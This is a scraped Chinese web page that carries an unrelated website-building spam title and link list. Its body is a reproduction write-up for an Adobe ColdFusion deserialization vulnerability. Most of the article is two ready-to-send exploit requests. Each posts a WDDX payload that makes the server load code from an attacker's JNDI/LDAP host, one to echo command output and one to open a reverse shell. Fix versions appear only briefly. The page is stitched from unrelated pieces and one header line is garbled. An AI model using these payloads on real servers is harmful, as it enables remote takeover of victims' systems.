当前位置: 首页 > news >正文

珠海微信网站开发视频网站建设费用

news 2025/9/18 10:33:11
珠海微信网站开发,视频网站建设费用,wordpress官网流量统计插件下载,做报废厂房网站怎么做0x01 产品简介 Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 0x02 漏洞概述 Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击…

0x01 产品简介

      Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

     Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。

0x03 影响范围

    ColdFusion 2018 <= Update 16 

    ColdFusion 2021 <= Update 6 

    ColdFusion 2023 GA Release (2023.0.0.330468)

0x04 复现环境

 docker搭建ColdFusion 2023.0.0.330468漏洞环境

拉取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动环境

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

 PS:需确认8080对应的端口

验证是否可访问环境

0x05 漏洞复现

exp

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: idargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://your-ip:1389/Basic/TomcatEcho</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

PS:本次复现需要使用jndi漏洞利用工具(JNDIExploit-1.4-SNAPSHOT.jar)

TomcatEcho回显链

 开启监听

反弹shell

利用链:

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencodedargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

 

 0x06 修复建议

根据影响版本中的信息,建议相关用户尽快更新至安全版本:

ColdFusion 2018 Update 17

ColdFusion 2021 Update 7

ColdFusion 2023 Update 1

下载链接请参考:

https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

http://www.yayakq.cn/news/473202/

相关文章:

  • 网站单页发布工程材料价格查询
  • 职友集 一家做职业点评的网站太原百度seo排名
  • 哪个网站可以做中文云文字多用户商城系统是什么
  • 安徽优化网站锡盟建设局网站
  • 宁波公司建网站哪家中国最好的猎头公司排行榜
  • 做拍客哪个网站好网站建设分工的通知
  • 网站建设成交话术网站规划建设与安全管理
  • 有趣又有深意的广告网络优化行业怎么样
  • seddog站长之家帮卖货平台
  • 网站怎样做自适应分辨率大小企业网站 论文
  • 网站建设工资多少钱买高端品牌网站
  • 网站备案 厦门纯静态网站是有什么程序做的
  • php网站开发报告书wordpress连接网盘插件
  • 速成美站新网站做seo优化步骤
  • 网站建设和管理专业好不好重庆建设摩托车股份有限公司官网
  • 重庆做商城网站建设wordpress手机端发布
  • 软件下载网站 知乎wordpress 买主题
  • 蕲春住房和城乡建设局网站奥林匹克做校服的网站
  • 网站推广是做什么工作wordpress怎么查看域名绑定
  • 网站描述模板河南省建设工程信息网推荐中项网
  • 网站开发图片框网站建设咨询电话
  • 云阳如何做网站制作介绍的网站
  • 手机网站一键分享微信客户管理系统
  • 绵阳网站定制电子商务网站建设精英
  • 新闻门户网站建设方案wordpress游客变注册用户
  • 天津自己制作网站网站开发整合套件
  • 建设合同网上备案上哪个网站wordpress标题标签
  • 社交媒体 网站深圳小程序app开发
  • 浙江网站建设电话网络推广网站的方法
  • 网站建设龙岗大学生网站建设申报书